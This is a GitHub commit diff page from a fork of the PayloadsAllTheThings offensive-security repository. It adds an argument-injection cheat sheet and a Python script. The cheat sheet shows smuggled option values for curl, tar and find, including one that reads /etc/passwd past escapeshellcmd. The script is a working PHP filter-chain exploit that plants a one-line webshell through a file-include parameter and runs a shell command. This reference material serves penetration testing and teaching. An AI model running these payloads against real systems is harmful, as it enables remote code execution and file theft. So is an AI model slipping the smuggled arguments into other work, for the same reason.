forked from swisskyrepo/PayloadsAllTheThings
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
78 changed files
with
4,702 additions
and
372 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,4 +1,3 @@ | ||
BuildPDF/ | ||
.vscode | ||
.todo | ||
AWS Amazon Lambda/ | ||
.todo |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,89 @@ | ||
# Argument Injection | ||
Argument injection is similar to command injection as tainted data is passed to to a command executed in a shell without proper sanitization/escaping. | ||
|
||
It can happen in different situations, where you can only inject arguments to a command: | ||
|
||
- Improper sanitization (regex) | ||
- Injection of arguments into a fixed command (PHP:escapeshellcmd, Python: Popen) | ||
- Bash expansion (ex: *) | ||
|
||
In the following example, a python script takes the inputs from the command line to generate a ```curl``` command: | ||
```py | ||
from shlex import quote,split | ||
import sys | ||
import subprocess | ||
|
||
if __name__=="__main__": | ||
command = ['curl'] | ||
command = command + split(sys.argv[1]) | ||
print(command) | ||
r = subprocess.Popen(command) | ||
``` | ||
It is possible for an attacker to pass several words to abuse options from ```curl``` command | ||
```ps1 | ||
python python_rce.py "https://www.google.fr -o test.py" | ||
``` | ||
We can see by printing the command that all the parameters are splited allowing to inject an argument that will save the response in an arbitrary file. | ||
```ps1 | ||
['curl', 'https://www.google.fr', '-o', 'test.py'] | ||
``` | ||
## Summary | ||
|
||
* [List of exposed commands](#list-of-exposed-commands) | ||
* [TAR](#TAR) | ||
* [CURL](#CURL) | ||
* [WGET](#WGET) | ||
* [References](#references) | ||
|
||
|
||
## List of exposed commands | ||
|
||
### CURL | ||
It is possible to abuse ```curl``` through the following options: | ||
|
||
```ps1 | ||
-o, --output <file> Write to file instead of stdout | ||
-O, --remote-name Write output to a file named as the remote file | ||
``` | ||
In case there is already one option in the command it is possible to inject several URLs to download and several output options. Each option will affect each URL in sequence. | ||
|
||
### TAR | ||
For the ```tar``` command it is possible to inject arbitrary arguments in different commands. | ||
|
||
Argument injection can happen into the '''extract''' command: | ||
```ps1 | ||
--to-command <command> | ||
--checkpoint=1 --checkpoint-action=exec=<command> | ||
-T <file> or --files-from <file> | ||
``` | ||
|
||
Or in the '''create''' command: | ||
```ps1 | ||
-I=<program> or -I <program> | ||
--use-compres-program=<program> | ||
``` | ||
There are also short options to work without spaces: | ||
```ps1 | ||
-T<file> | ||
-I"/path/to/exec" | ||
``` | ||
|
||
### FIND | ||
Find some_file inside /tmp directory. | ||
```php | ||
$file = "some_file"; | ||
system("find /tmp -iname ".escapeshellcmd($file)); | ||
``` | ||
|
||
Print /etc/passwd content. | ||
```php | ||
$file = "sth -or -exec cat /etc/passwd ; -quit"; | ||
system("find /tmp -iname ".escapeshellcmd($file)); | ||
``` | ||
|
||
|
||
## References | ||
|
||
- [staaldraad - Etienne Stalmans, November 24, 2019](https://staaldraad.github.io/post/2019-11-24-argument-injection/) | ||
- [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic, 06/25/2014](https://www.exploit-db.com/papers/33930) | ||
- [TL;DR: How exploit/bypass/use PHP escapeshellarg/escapeshellcmd functions - kacperszurek, Apr 25, 2018](https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,60 @@ | ||
import requests | ||
|
||
url = "http://localhost:8000/chall.php" | ||
file_to_use = "/etc/passwd" | ||
command = "id" | ||
|
||
#<?=`$_GET[0]`;;?> | ||
base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4" | ||
|
||
conversions = { | ||
'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2', | ||
'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2', | ||
'C': 'convert.iconv.UTF8.CSISO2022KR', | ||
'8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2', | ||
'9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB', | ||
'f': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213', | ||
's': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61', | ||
'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS', | ||
'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932', | ||
'P': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213', | ||
'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5', | ||
'0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2', | ||
'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2', | ||
'W': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2', | ||
'd': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2', | ||
'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2', | ||
'7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2', | ||
'4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2' | ||
} | ||
|
||
|
||
# generate some garbage base64 | ||
filters = "convert.iconv.UTF8.CSISO2022KR|" | ||
filters += "convert.base64-encode|" | ||
# make sure to get rid of any equal signs in both the string we just generated and the rest of the file | ||
filters += "convert.iconv.UTF8.UTF7|" | ||
|
||
|
||
for c in base64_payload[::-1]: | ||
filters += conversions[c] + "|" | ||
# decode and reencode to get rid of everything that isn't valid base64 | ||
filters += "convert.base64-decode|" | ||
filters += "convert.base64-encode|" | ||
# get rid of equal signs | ||
filters += "convert.iconv.UTF8.UTF7|" | ||
|
||
filters += "convert.base64-decode" | ||
|
||
final_payload = f"php://filter/{filters}/resource={file_to_use}" | ||
|
||
with open('payload', 'w') as f: | ||
f.write(final_payload) | ||
|
||
r = requests.get(url, params={ | ||
"0": command, | ||
"action": "include", | ||
"file": final_payload | ||
}) | ||
|
||
print(r.text) |
Oops, something went wrong.